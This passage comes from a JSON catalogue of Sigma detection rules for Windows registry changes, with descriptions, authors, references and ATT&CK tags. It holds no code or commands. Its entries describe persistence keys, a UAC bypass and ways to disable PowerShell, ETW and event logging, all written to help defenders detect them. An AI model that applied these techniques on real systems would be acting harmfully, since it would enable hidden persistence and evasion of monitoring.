], "filename": "registry_set_internet_explorer_disable_first_run_customize.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ab567429-1dfb-4674-b6d2-979fd2f9d125", "value": "Internet Explorer DisableFirstRunCustomize Enabled" }, { "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Legitimate enabling of the old tls versions due to incompatibility" ], "filename": "registry_set_tls_protocol_old_version_enabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "439957a7-ad86-4a8f-9705-a28131c6821b", "value": "Old TLS1.0/TLS1.1 Protocol Version Enabled" }, { "description": "Detects when an attacker registers a new IFilter for an extension. 
Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\nYou can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate registration of IFilters by the OS or software" ], "filename": "registry_set_persistence_ifilter.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", "https://twitter.com/0gtweet/status/1468548924600459267", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", "value": "Register New IFiltre For Persistence" }, { "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. 
This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_ie_security_zone_protocol_defaults_downgrade.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/M_haggis/status/1699056847154725107", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724", "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols" }, { "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legitimate tools using these service names and drivers. Note - clever attackers may easily bypass this detection by simply renaming the services. The rule is therefore only Medium-level; do not rely on it alone." 
], "filename": "registry_set_susp_service_installed.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" ], "tags": [ "attack.t1562.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", "value": "Suspicious Service Installed" }, { "description": "Detects registry changes under the currently logged-in user's hive that disable PowerShell module logging, script block logging, or transcription and script execution logging", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_logging_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "value": "PowerShell Logging Disabled Via Registry Key Tampering" }, { "description": "Detects a potential registry persistence technique using the Event Viewer \"Events.asp\" link", "meta": { "author": "Nasreddine Bencherchali (Nextron 
Systems)", "creation_date": "2023-02-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_event_viewer_events_asp.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks", "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/", "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md", "https://twitter.com/nas_bench/status/1626648985824788480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "value": "Potential Persistence Via Event Viewer Events.asp" }, { "description": "Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, The OS will backup System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\nRegistry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-01", "falsepositive": [ "Legitimate need for RegBack feature by administrators." 
], "filename": "registry_set_enable_periodic_backup.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "973ef012-8f1a-4c40-93b4-7e659a5cd17f", "value": "Periodic Backup For System Registry Hives Enabled" }, { "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use of the dll." 
], "filename": "registry_set_persistence_scrobj_dll.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "value": "Potential Persistence Via Scrobj.dll COM Hijacking" }, { "description": "Detects the installation of Chrome VPN extensions via the registry, as in the referenced Atomic Red Team test that installs two VPN extensions", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_chrome_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" ], "tags": [ "attack.persistence", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" }, { "description": "Detects the abuse of the exefile handler in a new file association. 
Used to bypass security products.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-11-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_file_association_exefile.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "value": "New File Association Using Exefile" }, { "description": "Detects tampering with the EventLog service \"file\" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", "meta": { "author": "D3F7A5105", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_evtx_file_key_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "value": "Potential EventLog File Location Tampering" }, { "description": "Detects a UAC bypass method using the Windows Event Viewer", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_eventvwr.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 
"https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "value": "UAC Bypass via Event Viewer" }, { "description": "Detects registry changes through which adversaries potentially disable the ETW providers that record loaded .NET assemblies (see the COMPlus_ETWEnabled references).", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_dot_net_etw_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", 
"https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry" }, { "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", "meta": { "author": "frack113", "creation_date": "2023-01-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_xll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_xll.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "value": 
"Potential Persistence Via Excel Add-in - Registry" }, { "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-09", "falsepositive": [ "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "filename": "registry_set_persistence_mycomputer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "value": "Potential Persistence Via MyComputer Registry Keys" }, { "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_install_root_or_ca_certificat.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "d223b46b-5621-4037-88fe-fda32eead684", "value": "New Root or CA or AuthRoot Certificate to Store" }, { "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_chm.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "value": "Potential Persistence Via CHM Helper DLL" }, { "description": "Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. 
This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-11-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_netsh_help_dll_persistence_susp_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml" ], "tags": [ "attack.persistence", "attack.t1546.007" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7b18879-676e-4a0e-ae18-27039185a8e7", "value": "New Netsh Helper DLL Registered From A Suspicious Location" }, { "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-12", "falsepositive": [ "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], "filename": "registry_set_susp_keyboard_layout_load.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", "value": "Suspicious Keyboard Layout Load" }, { "description": "Detects changes in Sysmon driver altitude value.\nIf the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.\n", "meta": { "author": "B.Talebi", "creation_date": "2022-07-28", "falsepositive": [ "Legitimate driver altitude change to hide sysmon" ], "filename": "registry_set_change_sysmon_driver_altitude.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", "https://youtu.be/zSihR3lTf7g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", "value": "Sysmon Driver Altitude Change" }, { "description": "Detects enabling of the RDP Remote Assistance feature via the registry, which allows a specific user to connect via RDP to the targeted machine", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use of the feature (alerts should be investigated either way)" ], "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "value": "Allow RDP Remote Assistance Feature" }, { "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_lsa_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/lsaaextension.html", "https://twitter.com/0gtweet/status/1476286368385019906", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "value": "Potential Persistence Via LSA Extensions" }, { "description": "Detects tampering with sensitive RDP Terminal Services/Server settings, such as allowing unauthorized users to access a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.\n", "meta": { "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "creation_date": "2022-08-06", "falsepositive": [ "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "filename": "registry_set_terminal_server_tampering.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://blog.sekoia.io/darkgate-internals/", "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", 
"https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry", "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "value": "RDP Sensitive Settings Changed" }, { "description": "Detects the modification of the registry to disable a system restore on the computer", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_system_restore.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", "value": "Registry Disable System Restore" }, { "description": "Detects VBScript content stored in registry keys, as seen being used by the UNC2452 group", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_vbs_payload_stored.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", "value": "VBScript Payload Stored in Registry" }, { "description": "Detects processes setting a new DLL path in the DllName value under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", "meta": { "author": "frack113", "creation_date": "2022-06-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_timeproviders_dllname.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" ], "tags": [ "attack.persistence", 
"attack.privilege-escalation", "attack.t1547.003" ] }, "related": [ { "dest-uuid": "61afc315-860c-4364-825d-0d62b2e91edc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "value": "New TimeProviders Registered With Uncommon DLL Name" }, { "description": "Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".\n", "meta": { "author": "@kostastsale, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-11-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_devdrv_disallow_antivirus_filter.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1720419490519752955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31e124fb-5dc4-42a0-83b3-44a69c77b271", "value": "Antivirus Filter Driver Disallowed On Dev Drive - Registry" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_office.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 
